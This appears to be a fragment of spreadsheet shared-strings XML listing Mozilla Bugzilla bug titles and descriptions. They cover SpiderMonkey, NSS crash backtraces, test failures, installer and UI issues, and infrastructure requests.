  </si>
  <si>
    <t>Need r= added to cvs log msg</t>
  </si>
  <si>
    <t>mozilla/js/src/jsfun.c   3.174
Log message should be:
Bug 314874: Function.call/apply pass thisArg.valueOf() as this value when thisArg is not a primitive r=brendan</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-821777</t>
  </si>
  <si>
    <t>Populate flash version in telemetry data</t>
  </si>
  <si>
    <t>Right now telemtry sends flash version information on desktop but not on Android. It would be nice to have this.</t>
  </si>
  <si>
    <t>snorp</t>
  </si>
  <si>
    <t>CORE-505315</t>
  </si>
  <si>
    <t>constructing GC free lists during finalization</t>
  </si>
  <si>
    <t>This has 2 goals:
- Make ST and MT builds more similar in behavior (easier to maintain and test).
- Allow inlining of the fast path (take item from local free list) whereas the slow path will not be inline (refill local free list). This will be a separate patch.
The patch doesn't slow down ST builds and the extra memory use is negligible. MT builds are essentially binary-identical.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-67147</t>
  </si>
  <si>
    <t>berculo.com - Javascript-powered menu doesn't function</t>
  </si>
  <si>
    <t>The Javascript menu on the left hand side of this page works great with IE and
NS 4.x however Mozilla can't execute it. No messages in the Javascript console
either.</t>
  </si>
  <si>
    <t>TOOLKIT-514397</t>
  </si>
  <si>
    <t>[moz2-darwin9-slave*] xpcshell-tests: test_crashreporter.js crashes intermittently</t>
  </si>
  <si>
    <t>Similar to bug 488596 but it doesn't appear to be happening on shutdown.
From that bug:
  -------  Comment #76 From  Daniel Holbert [:dholbert]   2009-08-13 12:11:13 PDT   (-) [reply] -------
I think we hit this again today on moz2-darwin9-slave05
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1250178113.1250189451.4140.gz
OS X 10.5.2 mozilla-central unit test on 2009/08/13 08:41:53
Full output looks like this:
TEST-UNEXPECTED-FAIL |
/builds/moz2_slave/mozilla-central-macosx-unittest/build/objdir/_tests/xpcshell/crashreporter/unit/test_crashreporter.js
| test failed (with xpcshell return code: -10) see following log:
  &gt;&gt;&gt;&gt;&gt;&gt;&gt;
  ### XPCOM_MEM_LEAK_LOG defined -- logging leaks to
/var/folders/TL/TLg3RrMbFAur2hBCXvCeqk+++TM/-Tmp-/runxpcshelltests_leaks.log
TEST-INFO | (xpcshell/head.js) | test 1 pending
INFO | test_crashreporter.js | Get crashreporter service.
TEST-PASS |
/builds/moz2_slave/mozilla-central-macosx-unittest/build/objdir/_tests/xpcshell/crashreporter/unit/test_crashreporter.js
| [run_test : 11] [xpconnect wrapped nsICrashReporter] != null
INFO | test_crashreporter.js | Disable crashreporter.
TEST-PASS |
/builds/moz2_slave/mozilla-central-macosx-unittest/build/objdir/_tests/xpcshell/crashreporter/unit/test_crashreporter.js
| [run_test : 20] false == false
TEST-PASS |
/builds/moz2_slave/mozilla-central-macosx-unittest/build/objdir/_tests/xpcshell/crashreporter/unit/test_crashreporter.js
| [run_test : 27] 3253927937 == 3253927937
TEST-PASS |
/builds/moz2_slave/mozilla-central-macosx-unittest/build/objdir/_tests/xpcshell/crashreporter/unit/test_crashreporter.js
| [run_test : 35] 3253927937 == 3253927937
  &lt;&lt;&lt;&lt;&lt;&lt;&lt;
-------  Comment #77 From  Daniel Holbert [:dholbert]   2009-09-02 20:47:02 PDT   (-) [reply] -------
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1251937940.1251947331.27274.gz
OS X 10.5.2 mozilla-central unit test on 2009/09/02 17:32:20</t>
  </si>
  <si>
    <t>NSS-95982</t>
  </si>
  <si>
    <t>rsa.c: RSA_PrivateKeyOp will return uninitialized SECStatus on success.</t>
  </si>
  <si>
    <t>Summary says it all. RSA_PrivateKeyOp ends by returning rv but rv is never
initialized unless err is non-zero. I have no idea how important this function
is but this can't be good.</t>
  </si>
  <si>
    <t>CORE-504080</t>
  </si>
  <si>
    <t>Upgrade 1.9.1 to an NSS 3.12.4</t>
  </si>
  <si>
    <t>NSS 3.12.4 has some features most notably CRLDP support that we'd like to take on bch.  To do that we'll need to know which tag to use and then actually land it but we're also trying to get better about understanding the impact of new tags before taking them since much of the testing happens outside the regular gecko/firefox test infrastructure.
I think before we land this we should:
a) Check the top crashers on central (where 3.12.4 has already landed) and ensure that any NSS crashers are well understood
b) Get a clearer picture of the unit test story so that we know how covered the new code is (though this may spawn into its own bug around integrating/copying those tests and results more deeply into gecko's own testing structures)
not flagging for blocking1.9.1.x until we have answers there but I thought I'd get the bug going anyhow.</t>
  </si>
  <si>
    <t>SEAMONKEY-112162</t>
  </si>
  <si>
    <t>Middle truncate attachment list in message headers</t>
  </si>
  <si>
    <t>Spin off of 80220
In order to show the attachment extension we could middle truncate the
attachment name in the message attachments header area instead of cropping on
the right. 
My main concern here is that the attachment area may not look very good if most
files are middle truncated.  If we find that most attachments get truncated we
should consider expanding the size of the attachment area.</t>
  </si>
  <si>
    <t>scottputterman</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-332803</t>
  </si>
  <si>
    <t>elements with xsi:type are not validated on form load</t>
  </si>
  <si>
    <t>We do not seem to validate elements with types set directly by xsi:type on form load.</t>
  </si>
  <si>
    <t>FIREFOX-225505</t>
  </si>
  <si>
    <t>Installer does not get rid of ns_temp in Temp folder when install completes</t>
  </si>
  <si>
    <t>I am left with a ns_temp folder in my user's Temp directory after installing a
build containing all the install files - .xpis etc. These take up valuable
disk space and should be removed after a successful installation.</t>
  </si>
  <si>
    <t>CORE-134323</t>
  </si>
  <si>
    <t>setAttribute(src) does not load iframe document</t>
  </si>
  <si>
    <t>iframe.setAttribute(src http://www.google.com) has no effect.  iframe.src =
http://www.google.com has an effect.  Probably happens with frames too I'll
check that when I fix this.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-482345</t>
  </si>
  <si>
    <t>Create a video upload interface for videos.mozilla.org</t>
  </si>
  <si>
    <t>CORE-481537</t>
  </si>
  <si>
    <t>scary asserts running content/media mochitests on mac debug build</t>
  </si>
  <si>
    <t>*** 20 INFO TEST-PASS | /tests/content/media/video/test/test_access_control.html | Won't load when redirected to subdomain
###!!! ASSERTION: How can we have a frame but no metadata?: 'aNextFrame != NEXT_FRAME_AVAILABLE'
file /Users/sayrer/dev/clean-tm/content/html/content/src/nsHTMLMediaElement.cpp line 1210
*** 26 INFO TEST-PASS | /tests/content/media/video/test/test_access_control.html | Won't load cross domain
###!!! ASSERTION: Potential deadlock between media.decoderMonitor@21980f30 and Lock@21954bc0: 'Error' file nsAutoLock.cpp line 318
*** 98 INFO Running /tests/content/media/video/test/test_can_play_type.html...
++DOMWINDOW == 13 (0x1e6ec4e0) [serial = 43] [outer = 0x1e6bd5f0]
###!!! ASSERTION: cannot call GetUsedBorder on a dirty frame not currently being reflowed: 'nsLayoutUtils::sDisableGetUsedXAssertions || !NS_SUBTREE_DIRTY(this) || (GetStateBits() &amp; NS_FRAME_IN_REFLOW)' file /Users/sayrer/dev/clean-tm/layout/generic/nsFrame.cpp line 616
###!!! ASSERTION: Why is the root in mDirtyRoots already?: '!mDirtyRoots.Contains(rootFrame)' file /Users/sayrer/dev/clean-tm/layout/base/nsPresShell.cpp line 2469</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-174899</t>
  </si>
  <si>
    <t>Add search for history and bookmarks in the bookmarks/history manager</t>
  </si>
  <si>
    <t>i don't know how feasible it would be but could a QuickSearch field be added to
the Sidebar?
i've found QS incredibly useful in mailnews (mozilla/nscp). and i noticed that
in phoenix the sidebar has a QS field for both history and bookmarks. this
would be helpful in chimera when one's bookmark list is huge (as well as
history when turned on).</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-567472</t>
  </si>
  <si>
    <t>content.css performance issues</t>
  </si>
  <si>
    <t>looking through content.css the other day with dbaron he suggested that we may have some relatively serious performance issues in content.css.  For example:
 html e selectors are much slower than e did you really want namespaces instead of descendant combinators?
We may have other issues this is definitely worth auditing.</t>
  </si>
  <si>
    <t>MOZILLA_LABS-570527</t>
  </si>
  <si>
    <t>Update Mozilla Labs homepage</t>
  </si>
  <si>
    <t>Now that Sync has graduated can we make Contacts the most prominent product at the top of the page (replace Sync position).</t>
  </si>
  <si>
    <t>smartell</t>
  </si>
  <si>
    <t>mayumi</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-740347</t>
  </si>
  <si>
    <t>kickstart getpersonas db cluster in scl3</t>
  </si>
  <si>
    <t>please kickstart the following nodes with rhel6 setup dns dhcp and run a base puppetize on them (don't add them to any mysql classes we will be working these up with percona 5.5 later)
getpersonas1.db.scl3.mozilla.com:
https://inventory.mozilla.org/en-US/systems/show/5228/
getpersonas2.db.scl3.mozilla.com:
https://inventory.mozilla.org/en-US/systems/show/5229/
Also make sure they get their vlan flipped to 70 and change their status in inventory to 'production' once they are up.
please poke sheeri when these are up.
tia!</t>
  </si>
  <si>
    <t>rbryce</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-460631</t>
  </si>
  <si>
    <t>Resources? MIME don't need no stinkin' resources!</t>
  </si>
  <si>
    <t>Created attachment 343765
rm -rf mailnews/mime/resources/
The .properties files only went unused with the creation of suite/locales/ but mime.js seems to have gone unused between 0.9.4 and 1.0 and then been unjarred but not deleted since somewhere between 1.4 and 1.7.</t>
  </si>
  <si>
    <t>TOOLKIT-465510</t>
  </si>
  <si>
    <t>random failures on test_database_sync_after_addVisit.js</t>
  </si>
  <si>
    <t>i see random failures for this test on the tinderboxes especially on windows see for example
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1227011143.1227014283.15580.gz
i suppose this is mostly a timer issue due to the sync timer being low (1s). Hwv we should investigate on why that happens.</t>
  </si>
  <si>
    <t>TOOLKIT-493374</t>
  </si>
  <si>
    <t>Avoid marking database as corrupt if initializing additional db objects fails and avoid creating more than one corrupt file every 24 hours.</t>
  </si>
  <si>
    <t>Our init DB path is wrong in 2 points:
- the DB should be considered corrupt only if it is corrupt or if it's schema is corrupt. A failure in initalizing additional items like views functions temp tables should not be considered as a corrupt database.
- If we mark db as corrupt we backup it and create a new one if something fails out of the basic database creation or database close fails for any reason this process starts looping and we continue creating corrupt files till user's disk is full.
I think this is something we should really fix for next release or future changes could become a pain.</t>
  </si>
  <si>
    <t>NSS-421870</t>
  </si>
  <si>
    <t>Strsclnt crashed in PKIX tests.</t>
  </si>
  <si>
    <t>Branch: securitytip
Build: 20080307.1
Platform: SunOS5.10_i86pc_DBG.OBJ
ssl.sh: #3449: Stress SSL2 RC4 128 with MD5 (no reuse client auth) produced a returncode of 1 expected is 0.  - Core file is detected.
There were 2 core files found produced at the same time - core from selfserv and core from strsclnt. Selfserv one is the same as in bug 400947 strsclnt analysis is there:
bash-3.00$ dbx /share/builds/mccrel3/security/securitytip/builds/20080307.1/wozzeck_Solaris8/mozilla/security/nss/cmd/strsclnt/SunOS5.8_i86pc_DBG.OBJ/strsclnt /export/test/core.strsclnt.16222
t@null (l@1) terminated by signal KILL (Killed)
0xd09f1065: __lwp_wait+0x0015:  jae      __lwp_wait+0x23        [ 0xd09f1073 .+0xe ]
Current function is PR_JoinThread
  594           rv = pthread_join(id 
(dbx) where                                                                  
  [1] __lwp_wait(0x2 0x8046f50) at 0xd09f1065 
  [2] lwp_wait(0x2 0x8046f50) at 0xd09e3c03 
  [3] _thrp_join(0x2 0x0 0x8046f98 0x1) at 0xd09ec998 
  [4] _pthread_join(0x2 0x8046f98) at 0xd09ecb17 
=&gt;[5] PR_JoinThread(thred = 0x80e6c60) line 594 in ptthread.c
  [6] reap_threads() line 497 in strsclnt.c
  [7] client_main(port = 8444U connections = 100 Cert_And_Key = 0x80470e0 hostName = 0x8084708 mandela.red.iplanet.com) line 1278 in strsclnt.c
  [8] main(argc = 19 argv = 0x804715c) line 1474 in strsclnt.c
(dbx) threads
      t@1  a  l@1   ?()   LWP suspended in  __lwp_wait() 
      t@2  a  l@2   _pt_root()   LWP suspended in  __pollsys() 
      t@3  a  l@3   _pt_root()   LWP suspended in  __pollsys() 
      t@4  a  l@4   _pt_root()   sleep on 0xd0a1b1a8  in  __lwp_park() 
      t@5  a  l@5   _pt_root()   LWP suspended in  __pollsys() 
      t@6  a  l@6   _pt_root()   LWP suspended in  __pollsys() 
      t@7  a  l@7   _pt_root()   LWP suspended in  __pollsys() 
o     t@8  a  l@8   _pt_root()   signal SIGSEGV in  strlen() 
      t@9  a  l@9   _pt_root()   LWP suspended in  __pollsys() 
(dbx) where t@1
current thread: t@1
=&gt;[1] __lwp_wait(0x2 0x8046f50) at 0xd09f1065 
  [2] lwp_wait(0x2 0x8046f50) at 0xd09e3c03 
  [3] _thrp_join(0x2 0x0 0x8046f98 0x1) at 0xd09ec998 
  [4] _pthread_join(0x2 0x8046f98) at 0xd09ecb17 
  [5] PR_JoinThread(thred = 0x80e6c60) line 594 in ptthread.c
  [6] reap_threads() line 497 in strsclnt.c
  [7] client_main(port = 8444U connections = 100 Cert_And_Key = 0x80470e0 hostName = 0x8084708 mandela.red.iplanet.com) line 1278 in strsclnt.c
  [8] main(argc = 19 argv = 0x804715c) line 1474 in strsclnt.c
(dbx) where t@2
current thread: t@2
=&gt;[1] __pollsys(0xd04fb9b0 0x1 0xd04fb980 0x0) at 0xd09f0aa5 
  [2] _pollsys(0xd04fb9b0 0x1 0xd04fb980 0x0) at 0xd09e5229 
  [3] _poll(0xd04fb9b0 0x1 0x1388) at 0xd099a672 
  [4] pt_poll_now(op = 0xd04fba14) line 599 in ptio.c
  [5] pt_Continue(op = 0xd04fba14) line 722 in ptio.c
  [6] pt_Recv(fd = 0x80c9b40 buf = 0x80ecc70 amount = 5 flags = 0 timeout = 4294967295U) line 1863 in ptio.c
  [7] ssl_DefRecv(ss = 0x80ec9f0 buf = 0x80ecc70 ^V^C len = 5 flags = 0) line 94 in ssldef.c
  [8] ssl3_GatherData(ss = 0x80ec9f0 gs = 0x80ecc30 flags = 0) line 90 in ssl3gthr.c
  [9] ssl3_GatherCompleteHandshake(ss = 0x80ec9f0 flags = 0) line 195 in ssl3gthr.c
  [10] ssl_GatherRecord1stHandshake(ss = 0x80ec9f0) line 1258 in sslcon.c
  [11] ssl_Do1stHandshake(ss = 0x80ec9f0) line 151 in sslsecur.c
  [12] ssl_SecureSend(ss = 0x80ec9f0 buf = 0x8067bec GET /abc HTTP/1.0^M\n^M\n len = 21 flags = 0) line 1152 in sslsecur.c
  [13] ssl_Send(fd = 0x80c9700 buf = 0x8067bec len = 21 flags = 0 timeout = 4294967295U) line 1447 in sslsock.c
  [14] PR_Send(fd = 0x80c9700 buf = 0x8067bec amount = 21 flags = 0 timeout = 4294967295U) line 226 in priometh.c
  [15] handle_connection(ssl_sock = 0x80c9700 tid = 0) line 693 in strsclnt.c
  [16] do_connects(a = 0x8047024 b = 0x80c9580 tid = 0) line 883 in strsclnt.c
  [17] thread_wrapper(arg = 0x80828b8) line 436 in strsclnt.c
  [18] _pt_root(arg = 0x80e6c60) line 221 in ptthread.c
  [19] _thr_setup(0xd0a32400) at 0xd09ef708 
  [20] _lwp_start() at 0xd09ef9f0 
(dbx) where t@4
current thread: t@4
=&gt;[1] __lwp_park(0x0 0x0) at 0xd09efa69 
  [2] mutex_lock_queue(0xd02d0400 0x0 0xd0a1b1a8 0x0) at 0xd09e8ad5 
  [3] slow_lock(0xd02d0400 0xd0a1b1a8 0x0) at 0xd09e9371 
  [4] mutex_lock_impl(0xd0a1b1a8 0x0) at 0xd09e9467 
  [5] _private_mutex_lock(0xd0a1b1a8) at 0xd09e9573 
  [6] _flockget(0xd0a1c080) at 0xd09d68d3 
  [7] printf(0xd0e6fbd8 0xd0e51166) at 0xd09ccce6 
  [8] pkix_trace_dump_cert(info = 0xd0e6e3d0 pkix_CheckChain cert = 0x822c37c plContext = 0x820dc30) line 73 in pkix_build.c
  [9] pkix_CheckChain(certs = 0x822f0ac numCerts = 1U checkers = 0x82402f4 revCheckers = 0x81f41dc removeCheckedExtOIDs = 0x820e15c procParams = 0x82395e4 pCertCheckedIndex = 0x8217534 pCheckerIndex = 0x8217538 pRevChecking = 0x8217560 pReasonCode = 0x8217548 pNBIOContext = 0xd02cd45c pFinalSubjPubKey = 0xd02cd468 pPolicyTree = 0xd02cd464 pVerifyTree = (nil) plContext = 0x820dc30) line 942 in pkix_validate.c
  [10] pkix_Build_ValidateEntireChain(state = 0x8217514 anchor = 0x82453bc pNBIOContext = 0xd02cd4d8 pValResult = 0xd02cd4f4 verifyNode = 0x82411f4 plContext = 0x820dc30) line 1621 in pkix_build.c
  [11] pkix_Build_CheckInCache(state = 0x8217514 pBuildResult = 0xd02cd580 pNBIOContext = 0xd02cd5d0 plContext = 0x820dc30) line 3669 in pkix_build.c
  [12] pkix_Build_InitiateBuildChain(procParams = 0x82395e4 pNBIOContext = 0xd02cd694 pState = 0xd02cd69c pBuildResult = 0xd02cd698 pVerifyNode = 0xd02cd718 plContext = 0x820dc30) line 4120 in pkix_build.c
  [13] PKIX_BuildChain(procParams = 0x82395e4 pNBIOContext = 0xd02cd714 pState = 0xd02cd710 pBuildResult = 0xd02cd71c pVerifyNode = 0xd02cd718 plContext = 0x820dc30) line 4364 in pkix_build.c
  [14] cert_BuildAndValidateChain(procParams = 0x82395e4 pResult = 0xd02cd75c pVerifyNode = 0xd02cd758 plContext = 0x820dc30) line 777 in certvfypkix.c
  [15] cert_VerifyCertChainPkix(cert = 0x8209788 checkSig = 1 requiredUsage = certUsageSSLServer time = 1204893517460748ULL wincx = (nil) log = (nil) pSigerror = (nil) pRevoked = (nil)) line 1190 in certvfypkix.c
  [16] cert_VerifyCertChain(handle = 0x80b3b48 cert = 0x8209788 checkSig = 1 sigerror = (nil) certUsage = certUsageSSLServer t = 1204893517460748LL wincx = (nil) log = (nil) revoked = (nil)) line 870 in certvfy.c
  [17] CERT_VerifyCertChain(handle = 0x80b3b48 cert = 0x8209788 checkSig = 1 certUsage = certUsageSSLServer t = 1204893517460748LL wincx = (nil) log = (nil)) line 882 in certvfy.c
  [18] CERT_VerifyCert(handle = 0x80b3b48 cert = 0x8209788 checkSig = 1 certUsage = certUsageSSLServer t = 1204893517460748LL wincx = (nil) log = (nil)) line 1479 in certvfy.c
  [19] CERT_VerifyCertNow(handle = 0x80b3b48 cert = 0x8209788 checkSig = 1 certUsage = certUsageSSLServer wincx = (nil)) line 1530 in certvfy.c
  [20] SSL_AuthCertificate(arg = 0x80b3b48 fd = 0x80c99c0 checkSig = 1 isServer = 0) line 255 in sslauth.c
  [21] mySSLAuthCertificate(arg = 0x80b3b48 fd = 0x80c99c0 checkSig = 1 isServer = 0) line 275 in strsclnt.c
  [22] ssl3_HandleCertificate(ss = 0x80fe658 b = 0x81243d2 ^M length = 0) line 7261 in ssl3con.c
  [23] ssl3_HandleHandshakeMessage(ss = 0x80fe658 b = 0x8123ed6  length = 1276U) line 7939 in ssl3con.c
  [24] ssl3_HandleHandshake(ss = 0x80fe658 origBuf = 0x80fe89c) line 8063 in ssl3con.c
  [25] ssl3_HandleRecord(ss = 0x80fe658 cText = 0xd02cdb04 databuf = 0x80fe89c) line 8326 in ssl3con.c
  [26] ssl3_GatherCompleteHandshake(ss = 0x80fe658 flags = 0) line 206 in ssl3gthr.c
  [27] ssl_GatherRecord1stHandshake(ss = 0x80fe658) line 1258 in sslcon.c
  [28] ssl_Do1stHandshake(ss = 0x80fe658) line 151 in sslsecur.c
  [29] ssl_SecureSend(ss = 0x80fe658 buf = 0x8067bec GET /abc HTTP/1.0^M\n^M\n len = 21 flags = 0) line 1152 in sslsecur.c
  [30] ssl_Send(fd = 0x80c99c0 buf = 0x8067bec len = 21 flags = 0 timeout = 4294967295U) line 1447 in sslsock.c
  [31] PR_Send(fd = 0x80c99c0 buf = 0x8067bec amount = 21 flags = 0 timeout = 4294967295U) line 226 in priometh.c
  [32] handle_connection(ssl_sock = 0x80c99c0 tid = 2) line 693 in strsclnt.c
  [33] do_connects(a = 0x8047024 b = 0x80c9580 tid = 2) line 883 in strsclnt.c
  [34] thread_wrapper(arg = 0x80828f0) line 436 in strsclnt.c
  [35] _pt_root(arg = 0x80e6d70) line 221 in ptthread.c
  [36] _thr_setup(0xd02d0400) at 0xd09ef708 
  [37] _lwp_start() at 0xd09ef9f0 
(dbx) where t@8
current thread: t@8
=&gt;[1] strlen(0x0) at 0xd0974adc 
  [2] _ndoprnt(0xd0e6fc02 0xcfecd2e0 0xd0a1c080 0x0) at 0xd09ca096 
  [3] printf(0xd0e6fbf4 0x0) at 0xd09ccd54 
  [4] pkix_trace_dump_cert(info = 0xd0e6e3d0 pkix_CheckChain cert = 0x822c37c plContext = 0x8244378) line 74 in pkix_build.c
  [5] pkix_CheckChain(certs = 0x82411bc numCerts = 1U checkers = 0x824128c revCheckers = 0x81f4144 removeCheckedExtOIDs = 0x82141bc procParams = 0x8206ccc pCertCheckedIndex = 0x82403dc pCheckerIndex = 0x82403e0 pRevChecking = 0x8240408 pReasonCode = 0x82403f0 pNBIOContext = 0xcfecd45c pFinalSubjPubKey = 0xcfecd468 pPolicyTree = 0xcfecd464 pVerifyTree = (nil) plContext = 0x8244378) line 942 in pkix_validate.c
  [6] pkix_Build_ValidateEntireChain(state = 0x82403bc anchor = 0x82453bc pNBIOContext = 0xcfecd4d8 pValResult = 0xcfecd4f4 verifyNode = 0x824025c plContext = 0x8244378) line 1621 in pkix_build.c
  [7] pkix_Build_CheckInCache(state = 0x82403bc pBuildResult = 0xcfecd580 pNBIOContext = 0xcfecd5d0 plContext = 0x8244378) line 3669 in pkix_build.c
  [8] pkix_Build_InitiateBuildChain(procParams = 0x8206ccc pNBIOContext = 0xcfecd694 pState = 0xcfecd69c pBuildResult = 0xcfecd698 pVerifyNode = 0xcfecd718 plContext = 0x8244378) line 4120 in pkix_build.c
  [9] PKIX_BuildChain(procParams = 0x8206ccc pNBIOContext = 0xcfecd714 pState = 0xcfecd710 pBuildResult = 0xcfecd71c pVerifyNode = 0xcfecd718 plContext = 0x8244378) line 4364 in pkix_build.c
  [10] cert_BuildAndValidateChain(procParams = 0x8206ccc pResult = 0xcfecd75c pVerifyNode = 0xcfecd758 plContext = 0x8244378) line 777 in certvfypkix.c
  [11] cert_VerifyCertChainPkix(cert = 0x8209788 checkSig = 1 requiredUsage = certUsageSSLServer time = 1204893517460650ULL wincx = (nil) log = (nil) pSigerror = (nil) pRevoked = (nil)) line 1190 in certvfypkix.c
  [12] cert_VerifyCertChain(handle = 0x80b3b48 cert = 0x8209788 checkSig = 1 sigerror = (nil) certUsage = certUsageSSLServer t = 1204893517460650LL wincx = (nil) log = (nil) revoked = (nil)) line 870 in certvfy.c
  [13] CERT_VerifyCertChain(handle = 0x80b3b48 cert = 0x8209788 checkSig = 1 certUsage = certUsageSSLServer t = 1204893517460650LL wincx = (nil) log = (nil)) line 882 in certvfy.c
  [14] CERT_VerifyCert(handle = 0x80b3b48 cert = 0x8209788 checkSig = 1 certUsage = certUsageSSLServer t = 1204893517460650LL wincx = (nil) log = (nil)) line 1479 in certvfy.c
  [15] CERT_VerifyCertNow(handle = 0x80b3b48 cert = 0x8209788 checkSig = 1 certUsage = certUsageSSLServer wincx = (nil)) line 1530 in certvfy.c
  [16] SSL_AuthCertificate(arg = 0x80b3b48 fd = 0x80c9aa0 checkSig = 1 isServer = 0) line 255 in sslauth.c
  [17] mySSLAuthCertificate(arg = 0x80b3b48 fd = 0x80c9aa0 checkSig = 1 isServer = 0) line 275 in strsclnt.c
  [18] ssl3_HandleCertificate(ss = 0x82552c8 b = 0x812b962 ^M length = 0) line 7261 in ssl3con.c
  [19] ssl3_HandleHandshakeMessage(ss = 0x82552c8 b = 0x812b466  length = 1276U) line 7939 in ssl3con.c
  [20] ssl3_HandleHandshake(ss = 0x82552c8 origBuf = 0x825550c) line 8063 in ssl3con.c
  [21] ssl3_HandleRecord(ss = 0x82552c8 cText = 0xcfecdb04 databuf = 0x825550c) line 8326 in ssl3con.c
  [22] ssl3_GatherCompleteHandshake(ss = 0x82552c8 flags = 0) line 206 in ssl3gthr.c
  [23] ssl_GatherRecord1stHandshake(ss = 0x82552c8) line 1258 in sslcon.c
  [24] ssl_Do1stHandshake(ss = 0x82552c8) line 151 in sslsecur.c
  [25] ssl_SecureSend(ss = 0x82552c8 buf = 0x8067bec GET /abc HTTP/1.0^M\n^M\n len = 21 flags = 0) line 1152 in sslsecur.c
  [26] ssl_Send(fd = 0x80c9aa0 buf = 0x8067bec len = 21 flags = 0 timeout = 4294967295U) line 1447 in sslsock.c
  [27] PR_Send(fd = 0x80c9aa0 buf = 0x8067bec amount = 21 flags = 0 timeout = 4294967295U) line 226 in priometh.c
  [28] handle_connection(ssl_sock = 0x80c9aa0 tid = 6) line 693 in strsclnt.c
  [29] do_connects(a = 0x8047024 b = 0x80c9580 tid = 6) line 883 in strsclnt.c
  [30] thread_wrapper(arg = 0x8082960) line 436 in strsclnt.c
  [31] _pt_root(arg = 0x80e6ff0) line 221 in ptthread.c
  [32] _thr_setup(0xd02d1400) at 0xd09ef708 
  [33] _lwp_start() at 0xd09ef9f0 
If the reason of failure is the same as in bug 400947 please set it as duplicate.</t>
  </si>
  <si>
    <t>CORE-118558</t>
  </si>
  <si>
    <t>Background tuncurated on http://www.antisocial.com</t>
  </si>
  <si>
    <t>Blue background was broken on http://www.antisocial.com 
(http://www.myownemail.com) sometime inbetween 0.9.6-0.9.7 on latest cvs it is 
still not displaying right.</t>
  </si>
  <si>
    <t>sbh</t>
  </si>
  <si>
    <t>MOZILLA.ORG-494303</t>
  </si>
  <si>
    <t>Create localizer SVN account for FrÃ©dÃ©ric Chateaux</t>
  </si>
  <si>
    <t>Please create SVN account for:
Name:  FrÃ©dÃ©ric Chateaux
Locale: fr
email:  fred.castles@laposte.net
This user needs to be added to the mozilla localizers group for svn as well as have access to mozilla europe French repo:
svn.mozilla.org/projects/mozilla-europe.org/trunk/{locale}
FrÃ©dÃ©ric is a long time contributor with cvs/hg access (bug #350931) his committer's agreement is on file and updated since Whistler he already has an ldap account.</t>
  </si>
  <si>
    <t>SEAMONKEY-183052</t>
  </si>
  <si>
    <t>assert on startup in RDFXMLDataSourceImpl::Flush() because mOriginalURLSpec is null</t>
  </si>
  <si>
    <t>assert on startup in RDFXMLDataSourceImpl::Flush() because mOriginalURLSpec is 
null
see possible related bug #122880
NTDLL! 77f97704()
nsDebug::Assertion(const char * 0x01d3e79c const char * 0x01d3e780 const char 
* 0x01d3e744 int 862) line 280 + 13 bytes
nsDebug::PreCondition(const char * 0x01d3e79c const char * 0x01d3e780 const 
char * 0x01d3e744 int 862) line 439 + 21 bytes
RDFXMLDataSourceImpl::Flush(RDFXMLDataSourceImpl * const 0x02f80204) line 862 + 
42 bytes
RDFXMLDataSourceImpl::~RDFXMLDataSourceImpl() line 509 + 12 bytes
RDFXMLDataSourceImpl::`scalar deleting destructor'(unsigned int 1) + 15 bytes
RDFXMLDataSourceImpl::Release(RDFXMLDataSourceImpl * const 0x02f80200) line 534 
+ 182 bytes
nsBookmarksService::initDatasource() line 4805 + 27 bytes
nsBookmarksService::LoadBookmarks() line 4831 + 11 bytes
nsBookmarksService::ReadBookmarks(nsBookmarksService * const 0x02ff91c8 int * 
0x0012e87c) line 4790
XPTC_InvokeByIndex(nsISupports * 0x02ff91c8 unsigned int 3 unsigned int 1 
nsXPTCVariant * 0x0012e87c) line 106
XPCWrappedNative::CallMethod(XPCCallContext &amp; {...} XPCWrappedNative::CallMode 
CALL_METHOD) line 2016 + 42 bytes
XPC_WN_CallMethod(JSContext * 0x01193240 JSObject * 0x03af08d8 unsigned int 
0 long * 0x03ba94c8 long * 0x0012eb58) line 1294 + 14 bytes
js_Invoke(JSContext * 0x01193240 unsigned int 0 unsigned int 0) line 839 + 23 
bytes
js_Interpret(JSContext * 0x01193240 long * 0x0012f9a0) line 2803 + 15 bytes
js_Invoke(JSContext * 0x01193240 unsigned int 1 unsigned int 2) line 856 + 13 
bytes
js_InternalInvoke(JSContext * 0x01193240 JSObject * 0x010f46a0 long 50454600 
unsigned int 0 unsigned int 1 long * 0x03ad9cf8 long * 0x0012facc) line 931 
+ 20 bytes
JS_CallFunctionValue(JSContext * 0x01193240 JSObject * 0x010f46a0 long 
50454600 unsigned int 1 long * 0x03ad9cf8 long * 0x0012facc) line 3431 + 31 
bytes
nsJSContext::CallEventHandler(nsJSContext * const 0x01184308 void * 
0x010f46a0 void * 0x0301e048 unsigned int 1 void * 0x03ad9cf8 int * 
0x0012fb64 int 0) line 1041 + 33 bytes
GlobalWindowImpl::RunTimeout(nsTimeoutImpl * 0x03ad9438) line 4679 + 84 bytes
GlobalWindowImpl::TimerCallback(nsITimer * 0x03ad9570 void * 0x03ad9438) line 
5039
nsTimerImpl::Fire() line 367 + 17 bytes
nsTimerManager::FireNextIdleTimer(nsTimerManager * const 0x011a5950) line 595
nsAppShell::Run(nsAppShell * const 0x011c3bc0) line 177
nsAppShellService::Run(nsAppShellService * const 0x011c38e0) line 472
main1(int 1 char * * 0x00284e10 nsISupports * 0x00276f08) line 1541 + 32 bytes
main(int 1 char * * 0x00284e10) line 1902 + 37 bytes
mainCRTStartup() line 338 + 17 bytes
KERNEL32! 77e9ca90()</t>
  </si>
  <si>
    <t>CORE-274088</t>
  </si>
  <si>
    <t>alwaysRaised/alwaysLowered window.open feature incorrectly disallowed to content script</t>
  </si>
  <si>
    <t>Content script isn't allowed to use the window.open(  alwaysRaised)
feature even with expanded privileges.</t>
  </si>
  <si>
    <t>CORE-405128</t>
  </si>
  <si>
    <t>Remove some nsDeque use from cycle collector</t>
  </si>
  <si>
